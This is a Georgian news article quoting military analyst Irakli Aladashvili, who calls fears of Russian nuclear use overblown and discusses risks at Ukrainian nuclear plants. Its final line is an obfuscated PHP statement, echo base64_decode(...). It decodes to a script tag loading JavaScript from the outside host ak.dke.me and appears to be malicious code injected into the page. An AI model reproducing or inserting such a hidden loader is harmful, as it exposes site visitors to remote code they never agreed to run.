celsiusi
ავერსი შნაიდერი
სამხედრო-ანალიტიკურ ჟურნალ “არსენალის” მთავარი რედაქტორი ირაკლი ალადაშვილი თვლის, რომ საზოგადოებაში გაჩენილი შიში რუსეთის მხრიდან ატომური იარაღის გამოყენების შესახებ გადაჭარბებულია და ადაიანებში პანიკა არ უნდა დავთესოთ. ამის შესახებ ალადაშვილმა საინფორმაციო სააგენტო BUSINESS TIME-თან განაცხადა.
 
მისივე თქმით, რასაკვირველია, მოცემული რეალობიდან გამომდინარე არსებობს გარკვეული საფრთხე ამ კუთხით, თუმცა ვარაუდობს, რომ მსგავს რამეზე ყველაზე ბოლოს შეიძლება ვიფიქროთ და მიიჩნევს, რომ საქმე აქამდე არ მივა. 
 
“შეიარაღებული დაპირისპირება, რომელიც შეიძლება ბირთვულ ომშიც გადაიზარდოს რა თქმა უნდა, საშიშია. რუსეთს გააჩნია როგორც სტრატეგიული დანიშნულების ბირთვული იარაღი - ეს არის საკონტინენტთაშორისო ბალისტიკური რაკეტები, რომლის გაშვებაც შეუძლია მიწისქვეშა შახტებიდან, წყალქვეშა ნავებიდან და ასევე სტრატეგიულ ბომბდამშენებზე ბირთვული ბომბების სახით. გარდა ამისა, არსებობს კიდევ ტაქტიკური ბირთვული იარაღი რომელიც შედარებით მძიმე სიმძლავრისაა. საბჭოთა პერიოდში 1989 წლის აპრილამდე საქართველოშიც ინახებოდა ტაქტიკური ბირთვული იარაღი, დაახლოებით 350 ერთეულამდე, რომელიც შემდეგ გატანილი იქნა.”- განაცხადა ალადაშვილმა. 
 
მისივე განმარტებით, საშიშროება რომელიც ახლა უკრაინასთან მიმართებაში არის ეს არის დაკავშირებული ატომურ ელექტროსადგურებთან.
 
“თავის დროზე, 1986 წელს ვიცით, რომ მოხდა ჩერნობილის მეოთხე ატომური რეაქტორის გააქტიურება - ელექტროსადგურზე ავარია. მას შემდეგ, ეს ელექტროსადგური გაჩერებულია, მაგრამ იმის გარდა, 4 ატომური ელექტროსადგურია უკრაინის ტერიტორიაზე და მათზე მუშაობს 15 ერთეული ატომური რეაქტორი. ჩვენ როგორც ვიცით, ზაპოროჟიეში მიმდინარეობს აქტიური საბრძოლო მოქმედებები, რაც ძალიან სახიფათოა, ვინაიდან, არსებობს საშიშროება, რომ შემთხვევით ან სპეციალურად ნასროლი რაკეტა არ მოხვდეს და არ დაანგრიოს, ან თვითმფრინავი არ იქნეს ჩამოგდებული და არ დაეცეს. თუმცა, თუ იქ მოხდება ავარია ეს არ ნიშნავს, რომ მოხდება ჯაჭვური რეაქცია და ატომური ან ბირთვული აფეთქება. ასეთ შემთხვევაში იქ შეიძლება  მოხდეს რადიაქტიული იზოტოპების გამოჟონვა ატმოსფეროში და ქარის ინერციით მათი გადატანა, რაც, რა თქმა უნდა, სახიფათოა ირგვლივ მდებარე ტერიტორიებისთვის რადიაციული თვალსაზრისით.
 
რაც შეეხება ბირთვულ აფეთქებებს - არსებობს ატომური ბომბები და არსებობს ბირთვული. ბირთვული უფრო საშიშია, უფრო ძლიერია, ბირთვულ ბომს გააჩნია ტუბაზური მოქმედება, გააჩნია სიმძლავვრეს, რა სიმძლავრეცაა ბირთვული კომბინი. გასროლის შემთხვევაში ჰაერის ტალღას დიდი სიჩქარით შეუძლია იყოს დამანგრეველი. მეორე არის რადიაციული გამოსხივება, “ალფა”, “ბეტა, “გამა” - გამოსხივება, ზოგისგან  შედარებით ადვილია დაცვა, ზოგი მათგანისგან კი უფრო რთული. მესამე არის ელექტრომაგნიტური იმპულსი აფეთქების დროს, რამაც შეიძლება გამოიწვიოს ელექტრო სისტემის მწყობრიდან გამოსვლა, ტელევიზიის, რადიოსი, მობილური ტელეფონების და ა.შ. საბჭოთა კავშირის დროს უხსნიდნენ ადამიანებს თუ როგორ უნდა მოქცეულიყვნენ ამა თუ იმ სიტუაციებში, ისწავლებოდა კიდეც. მე ვერ ჩამოგითვლით იმ ღონისძიებებს რა უნდა გააკეთონ ადამიანებმა მსგავს სიტუაციებში, ვინაიდ ეს შეიძლება იყოს პანიკის დათესვად აღქმული. ჩვენ იმედი უნდა ვიქონიოთ და მე დიდი იმედი მაქვს საქმე აქამდე არ მივა” - განმარტა ალადაშვილმა.
 
შეგახსენებთ, რომ რუსეთის პრეზიდენტმა ბირთვული იარაღის გამოყენების შესახებ მინიშნება გააკეთა და რუსეთის სტრატეგიული შეკავების ძალების სპეციალურ საბრძოლო რეჟიმზე გადაყვანის ბრძანება გასცა.
 
 
1415
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");